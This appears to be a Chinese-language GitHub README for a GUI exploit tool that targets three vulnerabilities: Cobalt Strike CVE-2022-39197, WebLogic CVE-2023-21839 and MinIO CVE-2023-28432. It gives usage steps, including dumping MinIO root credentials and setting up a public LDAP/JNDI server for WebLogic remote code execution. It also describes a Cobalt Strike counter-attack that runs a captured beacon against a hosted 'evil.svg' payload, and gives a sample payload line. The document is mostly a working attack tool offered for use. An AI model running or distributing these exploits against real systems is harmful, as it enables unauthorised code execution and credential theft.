A testing tool for CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432
对这三种漏洞的图形化漏洞检测和利用工具
1.运行jar需java8
2.针对单目标,不适用多ip漏扫
3.打包时weblogic漏洞利用需引用wlfullclient.jar,需自行添加
java -jar Gui-poc-test.jar
使用方法:有检测和利用两个按钮,漏洞不同的使用方法工具界面有提示
输入目标,无需输入端口,默认9000,可更改,见源码GuiDemo.java:line144
回显MINIO_ROOT_USER和MINIO_ROOT_PASSWORD等
![image](https://private-user-images.githubusercontent.com/55196564/287996332-42161c10-1acf-4866-92ae-19be85be5f14.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjA3NTgzOTcsIm5iZiI6MTcyMDc1ODA5NywicGF0aCI6Ii81NTE5NjU2NC8yODc5OTYzMzItNDIxNjFjMTAtMWFjZi00ODY2LTkyYWUtMTliZTg1YmU1ZjE0LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA3MTIlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNzEyVDA0MjEzN1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWY0ZjA3YmY5NmEzZGIzNTI5YjI3NjM0YTY4NDAwNjA3YmU0NDdjNTRjY2I1ZDI2MjRhNzk5M2FkZjc4OTg5NDQmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.g-JSNaMZtCOxPnGyrlQf-s_RFZKN_C5CLeiXSlKAp5w)
输入目标ip、端口、LDAP服务器地址
检测:
![image](https://private-user-images.githubusercontent.com/55196564/288132049-3a71f2d1-84c0-475b-b0c5-d962f567dbf9.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjA3NTgzOTcsIm5iZiI6MTcyMDc1ODA5NywicGF0aCI6Ii81NTE5NjU2NC8yODgxMzIwNDktM2E3MWYyZDEtODRjMC00NzViLWIwYzUtZDk2MmY1NjdkYmY5LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA3MTIlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNzEyVDA0MjEzN1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWVhZWUyYWYwYzMxNmQxOWE3N2UzOGQxYzM5NTgwYTVkZjRjYjQzMzUxMzViMThiNDcwZWJjNjAzYmRkNTM1ZDkmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.GQjUOe-y157RlbOQL4Bq34nLNtkr2gqaLwHGXpwY5yc)
注意:漏洞利用需自行搭建ldap服务器(公网)
- jndi server利用工具:使用JNDIExploit.jar工具开启LDAP和WEB服务,参考https://github.com/WhiteHSBG/JNDIExploit
![image](https://private-user-images.githubusercontent.com/55196564/288135610-a7465773-f8df-4110-9f96-4d0a73b14bf0.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjA3NTgzOTcsIm5iZiI6MTcyMDc1ODA5NywicGF0aCI6Ii81NTE5NjU2NC8yODgxMzU2MTAtYTc0NjU3NzMtZjhkZi00MTEwLTlmOTYtNGQwYTczYjE0YmYwLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA3MTIlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNzEyVDA0MjEzN1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTU1NjQ0Y2YwODAyMzc1NWJjOGQ0NWI4Mzg0NTk1MGVhNTJhMWZmMTM2NTg0YzRlZDlmZDRjYzYzYzgyNzgwYjMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.c8573UE3aNGEv1I9orvgMIdFBemgJG2aZ3d1wm0TU40)
- 选择漏洞后默认显示自查漏洞的方法,在cs监听器输入检测代码可自测漏洞是否存在
- 漏洞利用前提:本地已获取到对方木马(exe)
- 运行环境要求:win,python3,pip3安装frida-tools
- python已加入环境变量
- 自行搭建服务器放置svg文件,jar包,对方能访问
- 输入exe绝对路径和svg地址,空格隔开,点击执行实现反制
- jar包内容自行设置,演示内容为弹出计算器
- 默认木马名为beacon,可修改,见源码cve_2022_39197.py:line28
payload示例:
beacon.exe http://127.0.0.1:4444/evil.svg
实现结果:win运行马,mac上的cs客户端上线
同时cs端执行jar包内容,弹出计算器
![image](https://private-user-images.githubusercontent.com/55196564/288147155-30a827a6-a6e4-475e-8eba-54b208d67641.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjA3NTgzOTcsIm5iZiI6MTcyMDc1ODA5NywicGF0aCI6Ii81NTE5NjU2NC8yODgxNDcxNTUtMzBhODI3YTYtYTZlNC00NzVlLThlYmEtNTRiMjA4ZDY3NjQxLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA3MTIlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNzEyVDA0MjEzN1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTgyYjZmMDNiNmEzNmI2ZmI4MjhkZmMxZjlkMjU4NWExMmZhNzIwODg2YjU2MTdjMGZiNDBjYWU2MDVjOWY1MWMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.G1G0XOu6OgbIo8xpiLIC6vIFN_Us71-Y8HgcIv6iPNY)
win记录到cs访问地址
![image](https://private-user-images.githubusercontent.com/55196564/288145249-a96832d6-eb2a-4d77-b652-8078fa685411.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjA3NTgzOTcsIm5iZiI6MTcyMDc1ODA5NywicGF0aCI6Ii81NTE5NjU2NC8yODgxNDUyNDktYTk2ODMyZDYtZWIyYS00ZDc3LWI2NTItODA3OGZhNjg1NDExLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA3MTIlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNzEyVDA0MjEzN1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWQyNmU2ZDAzOGU5YmFhZmY2ZWI5N2QxYjNkMWJhYjg1MzZkNjU5NzBmMzA4NDIwMGUzOTZkNzViOWQ3MmJkMGYmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.NT5Fj1KptAy48Jc_rzbxL9hU1kjA6zgTBUgMeA6UERo)
原理:https://github.com/gobysec/Weblogic/blob/main/WebLogic_CVE-2023-21931_zh_CN.md
https://github.com/4ra1n/CVE-2023-21839
https://github.com/DXask88MA/Weblogic-CVE-2023-21839